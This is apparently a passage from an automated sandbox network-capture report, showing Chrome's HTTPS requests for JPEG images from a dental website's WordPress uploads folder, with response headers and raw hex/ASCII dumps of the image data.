                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 00 00 00 00 06 02 18 00 00 00 0c 40 03 00 00 00 00 01 80 00 00 00 00 0c 43 00 00 00 01 88 60 00 00 00 31 00 0c 00 00 06 20 01 80 00 00 00 01 65 f9 2f 5e ea aa fa e5 f7 94 5d 87 ab 0e 56 d2 d5 3a d7 b1 d4 be fe 35 a7 91 76 5c ba b9 c9 bf 99 5f e5 ad f6 7d a6 a6 d6 5c cb d1 2e b2 f1 4d 37 dd f3 0e 67 dd f3 17 e5 ad f6 3f 98 7e 5a df 7f cd 8f 75 3d b1 2a be ef 99 5d eb 7e ac 54 6b 4a 49 4a b5 ec 75 1f e5 ad f7 fc c7 f9 68 77 fc cb 36 b2 e6 5e 89 ed 97 83 ab ee f9 8e af bb e6 43 f2 d0 ed 7f 30 fc b4 3b 5f cc 9e ea be d8 9d 5f fa 30 ab ff 00 46 43 f2 d1 ed 7f 30 fc b4 7f 6a 5f 31 ee a6 22 75 7d 9f 68 55 f6 7d a5 7f 96 5f b5 2f 98 7e 55 7e dc be 63 dd 4c 45 95 7d 9f 6a 0a be c2 af ca af db 97 cc 3f 2b ff 00 99 2f 98 f7 53 11 65 5f 67 dc 3a be c2 9f ca bf fc 49
                                                                                                                                      Data Ascii: @C`1 e/^]V:5v\_}\.M7g?~Zu=*]~TkJIJuhw6^C0;__0FC0j_1"u}hU}_/~U~cLE}j?+/Se_g:I
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 53 b2 51 a9 f5 bc 8c 65 76 cf 2c 68 ae 43 58 b3 8e f2 e3 69 fa 77 55 2e 2a f3 73 6d a1 d2 fa d7 7f 06 d9 d7 a6 6c ec f9 6e 6f 55 b3 79 c6 dd d8 a8 4e b4 ec 75 7e 26 4b f9 d6 97 3c 23 71 2a 51 ef 4e 07 d4 3a 9f 4d f6 f7 59 c7 94 b3 f1 6d ca e5 1d 2e a4 94 93 e1 aa d4 f1 59 3e c1 b5 72 b7 ac e6 28 63 5a 75 8a b9 14 e4 d2 7d b5 5a 09 35 ff 00 57 ec 74 bb 6d 8e 34 f8 75 c3 cd 5a bf 1b 8a 12 e7 fa 9d 25 c7 e4 6d b7 91 7a ca e7 b5 76 51 a6 b5 52 d2 9e 06 cc cf 69 5c b0 f9 e1 97 09 3d 3c b1 8d 35 7c 3c 4e 6e 57 48 ce b7 1e 58 5d 8b 6a 91 d9 d0 59 33 c5 89 26 d8 fc da ff 00 17 63 1f dc 7d 43 1f 96 b7 23 75 52 b4 7b 9d cc 1f 79 d9 95 21 91 17 09 3e 3b a3 c0 cb 1f a9 59 4d 38 29 be e7 fa ca a5 2c 8b 69 41 d8 96 8b 5a 13 da c6 da eb 7a c7 d8 6d 75 7c 1b f1 5c 97 12
                                                                                                                                      Data Ascii: SQev,hCXiwU.*smlnoUyNu~&K<#q*QN:MYm.Y>r(cZu}Z5Wtm4uZ%mzvQRi\=<5|<NnWHX]jY3&c}C#uR{y!>;YM8),iAZzmu|\
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: be 3b f2 7d bf af ff 00 30 fa 07 4b 87 2d 9c b8 73 4e aa 4a d3 f5 2e 45 ae 0e 2b 63 e7 fd 5b f9 b1 6d d8 96 2f 48 c3 7e 77 5b 99 39 32 ac a5 fe ac 7f 59 f2 d6 db 5e 67 51 c6 29 6a fe 08 f2 df be de 4c 78 f5 9a 4f 5e bb 7d 6b 7f d2 9d f9 77 e7 ef 2f 70 c9 dd 76 73 6e 58 57 a9 ea fa 4f 91 ba 68 97 34 75 a1 c7 77 2f dc 6d ce 6d b7 ab ab dd 90 5c ae 94 d1 71 a9 34 fb 74 a6 c8 f3 f9 3c de 4f 25 cf 93 7d b6 f9 d6 e4 92 71 24 4a 31 ae 8c 93 4b 44 93 f0 12 9f 2a a5 77 d5 07 e6 12 8d 22 ab af d5 4a ea 73 52 56 9c 9e 9f 31 fa 34 7a aa f8 13 f5 a7 3d 21 0a be 2e 9b 91 92 c8 dd d1 77 54 07 18 a4 93 4f c0 8d cb 7c ea 89 fc fb 04 e3 35 5f 32 d7 65 5e 21 07 77 44 9a 6f 8d 48 3e 9f fc 9e c9 c9 87 f9 86 04 aa ec 79 6f 27 c1 4b e8 d3 c4 fa a9 f2 9f e5 46 7c 63 93 9f 87 28
                                                                                                                                      Data Ascii: ;}0K-sNJ.E+c[m/H~w[92Y^gQ)jLxO^}kw/pvsnXWOh4uw/mm\q4t<O%}q$J1KD*w"JsRV14z=!.wTO|5_2e^!wDoH>yo'KF|c(
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 92 49 f9 6d c5 73 72 37 a3 e1 a9 a4 74 ad ce 39 0b 9a 71 a4 2d af 3b 5f 4f 33 e1 a6 a8 a3 d4 e5 e4 f5 5f 32 8d 5c 68 eb ca ab b1 92 e5 fa 39 d6 4a 35 6b cb 1d 15 5f 79 6c f2 25 cb 18 a4 a4 ad a4 bc 69 b3 ed 74 03 a9 d3 ef d9 cb 85 de 91 7e b2 b3 7f fb a7 5d 2d dc 5f 4b af 79 56 76 0e 45 9e 9b 19 5d 5c b7 30 af 3b 73 5d 9c c6 48 4d bb 31 71 6a dd c5 24 9b 55 4d ad ea fb d1 ec 6c db 8f 5c e8 b9 32 ff 00 89 3b 2e 37 3b 5d cb 6b 99 4b e2 78 be ef c5 ef d6 6d 3a c7 a3 c1 e4 f6 dc 5e ed fe d2 ce f5 b0 95 a9 4a ba 7d c7 b9 c6 9f 3d 98 be 34 a3 3e 41 ec dc c9 46 f4 ac cb 47 17 46 7d 67 a7 cd 3b 49 2e 2a a7 97 ec f7 e7 db 7b 71 fe 4e bf 71 af 79 df 96 c4 31 01 ee 79 8c 00 0a 80 00 00 60 21 80 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: Imsr7t9q-;_O3_2\h9J5k_yl%it~]-_KyVvE]\0;s]HM1qj$UMl\2;.7;]kKxm:^J}=4>AFGF}g;I.*{qNqy1y`!
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 9c b5 3a 2d 00 03 2a 06 20 08 63 12 19 42 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 04 00 31 0a a0 48 04 86 00 00 00 30 00 00 18 80 06 31 00 0c 62 00 18 c4 30 00 00 01 80 00 00 00 00 00 00 00 86 00 20 00 01 88 00 08 e4 ff 00 d4 de fd f9 7d e5 45 b9 3f f5 37 bf 7e 5f 7b 2a 00 00 00 00 00 00 00 00 01 0c 40 02 18 00 98 86 26 02 10 c4 02 13 18 80 42 24 20 22 03 11 05 f6 f6 34 5b 33 db d8 be de e6 a0 b9 ec 73 f2 77 3a 0f 63 9f 93 b8 a3 30 86 00 20 00 20 40 31 32 84 26 31 32 05 40 00 00 00 00 18 00 c0 00 06 02 18 00 00 c0 10 05 00 60 00 14 18 00 86 30 28 00 28 30 15 06 01 c0 0c 19 7b 33 99 2d da 3a 99 7b 33 97 2d ce 7b 75 58 88 ff 00 49 11 90 31 d4 8d 46 98 12 dc 10 be 20 88 a6 35 f6 89 ba 80 44 80 88 ea 06 5e a5 83 6b a8 e1 dc c4 ba ab 19
                                                                                                                                      Data Ascii: :-* cB1H01b0 }E?7~_{*@&B$ "4[3sw:c0 @12&12@`0((0{3-:{3-{uXI1F 5D^k
                                                                                                                                      2024-04-24 10:13:33 UTC5402INData Raw: 5d 6a b3 97 2c 59 ea fa 26 23 8c 54 de f2 dd f6 2a 6b 53 89 d3 31 3d 49 d6 54 a7 63 3d 44 ae ac 57 0c 68 e9 72 e2 5e a4 16 d1 8f 05 f1 39 79 bc b3 c7 a5 de f6 e9 f3 6f c7 a5 df 79 ac ee f4 7d 1a fc 23 6e eb 49 25 ca d4 3b 95 0e 45 f8 56 7e 5d 99 a3 0b 99 41 b5 a2 6a 85 d7 ed 72 c5 34 bc cd 1f 9f df 7b b5 cd e6 db 6f e2 fa 7a eb 27 4f 84 5d d1 a3 5b 13 6d 78 1e af 1f 35 d8 b6 b9 9f 03 81 d3 6c f2 63 2d 77 2f c8 bc ab e9 f1 47 7f b6 cf bf 33 d1 c7 cd d3 ea d1 3c e4 ef 4a 69 d7 9b 71 dc 94 6e 5b e5 9e b5 d8 e4 5b 9a b7 26 f8 37 a7 c4 d2 f2 12 5a 70 3d 1b 78 ff 00 35 9e ae 53 6e 20 b0 de 16 4f 34 7e 99 69 42 fc cc ab d2 52 8c 74 52 5c 3b 4a 5c a1 93 0e 68 3f 3c 76 42 8d 6e 42 bf 8a 3c 11 c7 c5 b5 f1 79 3d b7 a5 6f c9 26 fa fb bb b9 33 ce bd 16 e1 72 5c 68 4b
                                                                                                                                      Data Ascii: ]j,Y&#T*kS1=ITc=DWhr^9yoy}#nI%;EV~]Ajr4{oz'O][mx5lc-w/G3<Jiqn[[&7Zp=x5Sn O4~iBRtR\;J\h?<vBnB<y=o&3r\hK


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      73192.168.2.164979891.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:32 UTC393OUTGET /wp-content/uploads/2017/03/home-treatment-3.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:32 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:32 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:24 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 175350
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:32 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:32 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                      2024-04-24 10:13:33 UTC14994INData Raw: 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 08 06 06 06 06 06 08 06 06 08 0c 08 07 08 0c 0e 0a 08 08 0a 0e 10 0d 0d 0e 0d 0d 10 11 0c 0e 0d 0d 0e 0c 11 0f 12 13 14 13 12 0f 18 18 1a 1a 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08 09 0a 09 0b 09 09 0b 0e 0b 0d 0b 0e 11 0e 0e 0e 0e 11 13 0d 0d 0e 0d 0d 13 18 11 0f 0f 0f 0f 11 18 16 17 14 14 14 17 16 1a 1a 18 18 1a 1a 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 ff c0 00 11 08 03 e8 06 de 03 01 22 00 02 11 01 03 11 01 ff c4 00 c3 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 01 01 01 01 01 01 01 01 00
                                                                                                                                      Data Ascii: on> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed#"""#''''''''''!! !!''''''''''"
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: fd 4b a3 fa 1e 06 65 bb a2 3f 27 12 4c 0a 19 a5 82 69 19 10 2e 01 ac 1f 9b 56 ee 7b 88 a5 2e b8 1d 1f a0 7a 4f a7 f4 53 d4 32 5f 36 47 50 c7 71 19 1d 3a 78 cc 9e 64 a0 11 48 22 61 04 02 45 43 e8 7c 2b 9b 97 83 eb 3f 57 75 86 74 e1 8f f4 42 66 36 73 83 1b 9f e4 c4 d7 b4 0f 3a 50 4b dc 0b a9 4f 17 15 d2 6b c6 6e 73 f7 19 b7 88 eb f5 cf 56 e4 60 ce 71 64 eb ad c8 74 04 33 23 0e 38 5e f6 ba ad 1b b6 f9 a1 ed 6b 99 7f c4 bd e7 a3 ba bb 7a df 49 76 49 8f 66 3b 48 8a 06 f8 80 da d0 3c 5e 20 2a 78 1a 5a a1 79 be 83 fa 6b 89 d2 f2 71 19 d4 83 72 73 db 11 7c d1 83 bb 6b dd 23 1a 2f a5 9a ef bd 7d 3f 1f 16 18 70 61 82 26 06 c5 13 7c b8 da 00 a0 6b 7c 2d f8 2e 1b e2 7d ad 47 29 c0 f9 ad 06 8d 6e 8d 3c 29 c1 6d 85 ed 73 46 d3 5b 5f 82 cd 95 08 69 dc 00 14 d1 2c 77 d0
                                                                                                                                      Data Ascii: Ke?'Li.V{.zOS2_6GPq:xdH"aEC|+?WutBf6s:PKOknsV`qdt3#8^kzIvIf;H<^ *xZykqrs|k#/}?pa&|k|-.}G)n<)msF[_i,w
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: d3 bd 76 2e b7 87 47 90 32 a2 1b 65 67 1f eb 05 d7 ad 0f 6a f9 cf 51 c7 c9 f4 d7 55 6f 53 c3 1f 90 f7 7e 63 46 94 3a 8f 6a f7 98 59 d0 75 2c 46 66 40 6a d7 8a 9e 60 f1 05 5e bf 56 6f 0d 61 d7 56 34 d1 50 d2 a6 1c a0 bc 15 30 42 a4 39 4c 15 55 68 2a 40 aa 81 52 0e 44 5a 0a 90 2a a0 54 c1 41 60 2a 40 aa 81 52 aa 0b 2a 98 2a ba a9 02 82 6a 28 06 a9 14 12 06 ea c0 55 20 ab 01 41 68 29 a8 02 a5 54 0d 08 aa 10 44 a1 34 90 15 49 08 40 14 24 8a a0 65 25 17 48 d6 dc 95 43 b3 f1 83 84 61 e1 cf 75 83 45 ca 0d 28 5b b1 3a 56 4e 4b 43 c8 da d3 cd 75 61 e8 51 b6 9e 63 aa 53 8e f5 66 b5 e7 43 1c ed 01 2a f8 f0 b2 24 b0 61 5e 95 98 fd 3e 17 f9 40 87 cb fc 0d f1 3b db 4d 16 f8 a0 e3 b0 31 bc b8 a6 64 ed f7 b5 f1 79 88 7a 24 ef 23 75 bb 17 4e 0f 4f 46 28 65 3e c5 d9 73 a2
                                                                                                                                      Data Ascii: v.G2egjQUoS~cF:jYu,Ff@j`^VoaV4P0B9LUh*@RDZ*TA`*@R**j(U Ah)TD4I@$e%HCauE([:VNKCuaQcSfC*$a^>@;M1dyz$#uNOF(e>s
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: dd 3d 2b ac bc 3b 2d 67 94 e3 63 4e 76 b2 ca 73 a5 83 20 1c 39 3f bb 70 71 94 80 45 5a 41 a0 ae b7 0b 8f 99 d7 5c e6 bb 17 1d d5 e0 f9 05 fb c0 47 4e cd ac 4e 8c b4 3e 41 50 d0 ed 2b cd 7a 3c 3e 0e 9b 6f f6 47 8f f7 1f ba eb a7 8f ed af 73 d7 bd 77 8b ea 5c 03 83 9b 8e c2 36 ed ca c3 93 e5 b0 bb e3 22 e3 98 3a 85 f2 7c ac 4e 8b 11 73 71 24 9a 80 9d bb a8 56 8e a1 33 21 8f 64 c3 76 7b 9c 7f 29 9a 06 9d 09 20 9f 72 e4 33 17 22 67 55 e0 8f 82 f5 c9 e8 f1 5b 96 ce 94 cf 2f 3e 09 de 4f 93 0b db 20 0d d4 b9 a7 73 41 5f 54 ea 79 9e 98 c9 87 1f a9 cf 2c 66 6d a7 7c 05 85 c5 84 f8 9d 56 d2 9b 1d 5a d3 f0 9e c2 be 5c 19 14 2c 8a 5c 37 ba 3c b6 9d af 89 e0 79 6e 1c f7 56 b5 f6 2d 78 3d 7e 7e 97 d4 71 fa 8c d8 ed 9d 90 1a 4d 8b 28 df 14 8c 78 da e6 3b 85 c6 85 4b 2e
                                                                                                                                      Data Ascii: =+;-gcNvs 9?pqEZA\GNN>AP+z<>oGsw\6":|Nsq$V3!dv{) r3"gU[/>O sA_Ty,fm|VZ\,\7<ynV-x=~~qM(x;K.
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 4c cf f6 db 3f ab 97 96 4f 96 5e 93 d0 3d 53 fc a7 d4 fd 37 28 bb 6b 1d 33 61 94 ff 00 46 5f ca 3f eb 2f bd 7a f7 0c 67 fa 53 aa e3 d2 a5 d8 d2 10 3b 5a 37 8f b1 7e 61 c6 94 c6 03 d9 67 b1 c0 b4 f6 83 50 bf 52 f4 ec e8 bd 45 e9 9c 7c d6 dd b9 78 e0 3c 6b e2 2d d8 f1 ef aa e7 b6 df 0f 3f 8b c9 f4 ff 00 d3 72 be 3b 9d 36 9f eb 97 e3 67 0a 38 84 42 f2 c9 9a ef e1 70 77 b8 d5 68 ea 30 1c 5c fc 9c 67 58 c5 2b d8 47 f5 5c 42 c8 3e 61 da b1 e6 d7 e3 e4 f2 69 e9 b5 9f 75 74 97 a5 7e 9e f4 fe 57 d4 f4 7c 39 6c 6b 18 fb 17 4f 77 62 f1 5f a7 d9 bf 51 e9 d8 01 75 4c 7e 1a 2f 58 25 3c d7 0f 1f e5 c7 a7 0d de ad 35 6f 10 80 23 3d 8a 81 29 53 12 ad 22 df 2d 85 1e 53 7b 15 62 46 f1 52 de da 20 fc eb eb 5f f9 cb d4 3f f1 2c cf f1 de b8 60 ae df ad 8f fe 72 f5 08 e3 fe 65
                                                                                                                                      Data Ascii: L?O^=S7(k3aF_?/zgS;Z7~agPRE|x<k-?r;6g8Bpwh0\gX+G\B>aiut~W|9lkOwb_QuL~/X%<5o#=)S"-S{bFR _?,`re
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: ae a1 00 11 4a 12 78 57 9a ad c0 06 b9 b6 2d da 08 3c c8 5a e6 2d 61 0f 0c 2e 6b 45 1c 3b 56 3a 3b c1 16 ca 34 82 6a 4d aa 55 96 a5 5f b0 3b 70 20 36 c0 b6 bf 15 26 40 49 6f f1 03 dd aa b1 ad 73 9c da d2 c2 82 8a 7b 5d 56 92 ea 01 6a d3 55 72 84 71 b7 3d ec 70 a0 70 f1 2a 59 0d 03 45 2a 5a eb 1e c5 ac 31 c1 a0 ba ee 37 04 a4 22 6b 0d 9b e2 3c 7b d5 94 12 08 da c6 f8 81 27 e0 bc ff 00 5e d9 f4 d2 bb 79 73 83 68 1a 35 ba ef 39 cd 8e 85 c0 72 da b8 5d 5d 9f 95 24 a4 50 6d 36 d3 45 d3 c7 d6 26 dd 1c 2f 46 75 d8 7c d9 7a 7c a4 99 1a ea b0 3b 88 e4 bd ec 72 5a b4 ee 5f 9f dd 99 2e 1f 54 76 44 24 b5 cd 7d 47 bd 7d 3b a5 fa 9d d3 61 b2 49 68 4b a8 07 7f 6a ed e6 f0 df 96 67 76 35 db 8e 5e f1 af 2e 65 a8 99 24 0a 6e b0 5e 7f 0f ad b5 ef a6 e1 b4 59 c1 74 22 ea 71
                                                                                                                                      Data Ascii: JxW-<Z-a.kE;V:;4jMU_;p 6&@Ios{]VjUrq=pp*YE*Z17"k<{'^ysh59r]]$Pm6E&/Fu|z|;rZ_.TvD$}G};aIhKjgv5^.e$n^Yt"q
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 9c 17 57 37 1d af 34 a5 87 1f e5 5c 69 18 e8 5d 4a 5b 81 50 68 0f b9 76 81 4a d6 fb 56 76 bf c2 2b ec 57 35 e2 9d 8a a2 55 b5 35 aa 8d 89 3d 8a 44 6e b8 d3 54 50 8a 1e 1d a8 a8 87 03 40 e3 a2 95 69 43 5a 73 e5 45 0f 9b 40 a4 d7 03 af b5 32 1e e2 fe e5 11 71 4f 8a 08 00 51 a4 d0 ea 12 16 a8 a7 f2 26 43 da 6a 4a 60 50 eb 7a e8 82 6b a2 87 65 53 22 fa 02 28 45 b8 28 3a 16 6a 2c 4a 6c 79 06 9c 39 23 75 74 06 bd b6 44 8a 68 e6 ea 2d d8 ab 2e 24 dc d9 6b a8 ad 28 aa 96 36 3c f8 7c 27 88 e0 82 90 ea 8e c4 69 71 a6 a9 10 59 a8 b2 05 f4 b2 29 fd a9 93 6a 2a c9 1d c5 36 d0 a0 95 42 75 0a b3 cd 01 dc 38 a0 b0 d6 9d d7 51 b5 7b 54 43 c8 4c 55 c6 8d b0 1a 94 16 44 49 9c 03 7f 09 1f 7a b8 03 4b 2a 23 1b 25 63 8d 6e 68 4f 61 b2 d5 60 ea 68 81 11 cf e2 80 38 81 de a5 b4
                                                                                                                                      Data Ascii: W74\i]J[PhvJVv+W5U5=DnTP@iCZsE@2qOQ&CjJ`PzkeS"(E(:j,Jly9#utDh-.$k(6<|'iqY)j*6Bu8Q{TCLUDIzK*#%cnhOa`h8
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 92 01 53 0b 9a ff 00 71 a2 f8 45 7f 91 7b f5 b9 f0 f8 ef a6 75 fb ae 7f ab 8d fc d5 2f b1 15 4b 8a 7a 28 a1 30 54 78 20 f0 bd d1 12 a9 fd c8 aa 55 4a a8 ab e0 90 c5 34 72 0b 6d 70 77 b8 af a6 7e a0 44 33 bd 19 8b 96 d0 09 8f 63 ab df 65 f2 d0 57 d5 d9 4e ab fa 73 23 35 74 71 1f 7b 6f f7 2e 3b 5f 8f 9f c1 b7 6f 95 d6 ff 00 f7 2f 5d 37 9f 6f dc f8 92 68 22 84 84 97 7b 31 6c 65 74 0e a3 c2 ea b7 e5 05 72 23 b3 81 5d 58 cd 58 0f b9 62 f5 58 a1 c3 6c fd ea 02 57 36 67 45 53 47 d3 e0 6a a7 38 db 23 4e aa 0f 6f fb cc 6e ec 3f 61 4f f6 1d 6f 5c 7f ce 7e a2 ff 00 89 e6 7f 8e f5 c0 d4 2e f7 ae 3f e7 4f 51 7f c4 f3 3f c7 7a e0 56 8b 40 aa 48 aa 48 86 8d 12 42 28 29 27 44 22 04 c0 4c 04 c0 40 34 29 86 a4 02 9b 55 12 00 29 80 93 45 54 c0 28 40 02 74 aa 90 6f f3 29 b5
                                                                                                                                      Data Ascii: SqE{u/Kz(0Tx UJ4rmpw~D3ceWNs#5tq{o.;_o/]7oh"{1letr#]XXbXlW6gESGj8#Non?aOo\~.?OQ?zV@HHB()'D"L@4)U)ET(@to)
                                                                                                                                      2024-04-24 10:13:33 UTC16384INData Raw: 75 8d 77 53 b9 73 f2 1e dc a8 9f 03 a9 e7 44 e0 41 a0 ae d2 3e 61 45 d4 8f e9 ce 33 dc 24 93 ce a1 0f 69 6d cd 6d c5 73 24 84 62 be 19 58 d2 08 b3 c8 06 b4 e2 0a d6 b7 f8 25 f5 55 d3 e5 c6 74 98 f0 12 47 85 cc 26 9f 33 8f 1a ae c8 c3 c6 ca 6b 8f 84 cf e1 0d d2 ef 6e ab 91 18 82 3c c7 cf 43 b4 50 b3 fa 35 bd 68 bb b8 ae 8a 41 1b e2 78 32 d4 b9 84 37 96 9b 95 de f3 99 69 3d d5 4a d8 4c 62 26 02 64 de 0c 6d 22 b4 1c 40 77 0b 85 cb eb f8 50 cf 8e 72 1a e6 82 f6 80 f6 fe 2d c4 fd ab b5 34 3e 0d e6 46 b5 cd 24 3d ba 5e b5 ab 7d eb 06 4e 3c 19 22 68 dc 1b 57 36 8c a7 31 c4 f6 a6 97 16 5c a6 d1 e5 fa 6e 34 39 78 b5 92 6a 1c 7a 97 87 70 68 d2 8a 9c ac 9e 99 14 b2 44 1d 53 23 45 1c cb 0d eb 4e 1e 13 24 c8 ce e9 ef 3b 1e 59 ba 3b 50 f3 a1 5c a9 3a 6c 10 4e d6 4b 2b
                                                                                                                                      Data Ascii: uwSsDA>aE3$imms$bX%UtG&3kn<CP5hAx27i=JLb&dm"@wPr-4>F$=^}N<"hW61\n49xjzphDS#EN$;Y;P\:lNK+


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      74192.168.2.164980191.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:32 UTC384OUTGET /wp-content/uploads/2017/03/surgery.jpg HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:32 UTC469INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:32 GMT
                                                                                                                                      content-type: image/jpeg
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:26 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 154921
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:32 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:32 UTC899INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 32 00 00 ff e1 03 81 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                      Data Ascii: ExifII*Ducky2http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
